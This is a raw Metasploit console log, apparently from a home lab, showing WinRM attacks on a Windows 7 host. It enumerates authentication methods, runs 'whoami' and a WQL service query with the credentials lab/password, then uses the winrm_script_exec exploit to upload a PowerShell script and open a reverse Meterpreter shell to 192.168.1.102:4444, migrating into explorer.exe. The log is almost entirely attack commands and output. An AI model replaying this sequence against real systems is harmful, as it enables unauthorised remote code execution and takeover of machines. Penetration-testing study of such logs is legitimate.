msf auxiliary(winrm_auth_methods) > show options

Module options (auxiliary/scanner/winrm/winrm_auth_methods):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   DOMAIN   WORKSTATION      yes       The domain to use for Windows authentification
   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS   192.168.1.103    yes       The target address range or CIDR identifier
   RPORT    5985             yes       The target port
   THREADS  1                yes       The number of concurrent threads
   URI      /wsman           yes       The URI of the WinRM service
   VHOST                     no        HTTP server virtual host

msf auxiliary(winrm_auth_methods) > run

[+] 192.168.1.103:5985: Negotiate protocol supported
[+] 192.168.1.103:5985: Basic protocol supported
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(winrm_cmd) > show options

Module options (auxiliary/scanner/winrm/winrm_cmd):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   CMD          whoami           yes       The windows command to run
   DOMAIN       WORKSTATION      yes       The domain to use for Windows authentification
   PASSWORD     password         yes       The password to authenticate with
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.1.103    yes       The target address range or CIDR identifier
   RPORT        5985             yes       The target port
   SAVE_OUTPUT  false            yes       Store output as loot
   THREADS      1                yes       The number of concurrent threads
   URI          /wsman           yes       The URI of the WinRM service
   USERNAME     lab              yes       The username to authenticate as
   VHOST                         no        HTTP server virtual host

msf auxiliary(winrm_cmd) > run

[+] sec\lab
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(winrm_wql) > show options

Module options (auxiliary/scanner/winrm/winrm_wql):

   Name       Current Setting                        Required  Description
   ----       ---------------                        --------  -----------
   DOMAIN     WORKSTATION                            yes       The domain to use for Windows authentification
   NAMESPACE  /root/cimv2/                           yes       The WMI namespace to use for queries
   PASSWORD   password                               yes       The password to authenticate with
   Proxies                                           no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     192.168.1.103                          yes       The target address range or CIDR identifier
   RPORT      5985                                   yes       The target port
   THREADS    1                                      yes       The number of concurrent threads
   URI        /wsman                                 yes       The URI of the WinRM service
   USERNAME   lab                                    yes       The username to authenticate as
   VHOST                                             no        HTTP server virtual host
   WQL        Select Name,Status from Win32_Service  yes       The WQL query to run

msf auxiliary(winrm_wql) > run

[+] Select Name,Status from Win32_Service (192.168.1.103)
=====================================================

 Name         Status
 ----         ------
 ALG          OK
 AeLookupSvc  OK
 AppIDSvc     OK
 AppMgmt      OK
 ......
 ......
msf exploit(winrm_script_exec) > show options

Module options (exploit/windows/winrm/winrm_script_exec):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   DOMAIN     WORKSTATION      yes       The domain to use for Windows authentification
   FORCE_VBS  false            yes       Force the module to use the VBS CmdStager
   PASSWORD   password         yes       A specific password to authenticate with
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST      192.168.1.103    yes       The target address
   RPORT      5985             yes       The target port
   URI        /wsman           yes       The URI of the WinRM service
   USERNAME   lab              yes       A specific username to authenticate as
   VHOST                       no        HTTP server virtual host

Exploit target:

   Id  Name
   --  ----
   0   Windows

msf exploit(winrm_script_exec) > run

[*] Started reverse TCP handler on 192.168.1.102:4444
[*] checking for Powershell 2.0
[-] You selected an x86 payload for an x64 target...trying to run in compat mode
[*] Attempting to set Execution Policy
[+] Set Execution Policy Successfully
[*] Grabbing %TEMP%
[*] Uploading powershell script to C:\Users\lab\AppData\Local\Temp\XcemuUGC.ps1 (This may take a few minutes)...
[*] Attempting to execute script...
[*] Sending stage (957487 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.102:4444 -> 192.168.1.103:49514) at 2015-12-26 15:37:13 +0800

meterpreter >
[*] Session ID 1 (192.168.1.102:4444 -> 192.168.1.103:49514) processing InitialAutoRunScript 'post/windows/manage/smart_migrate'
[*] Current server process: powershell.exe (1836)
[*] Attempting to move into explorer.exe for current user...
[+] Migrating to 2844
[+] Successfully migrated to process 2844
meterpreter > sysinfo
Computer        : SEC
OS              : Windows 7 (Build 7600).
Architecture    : x64
System Language : zh_CN
Domain          : WORKGROUP
Logged On Users : 1
Meterpreter     : x64/win64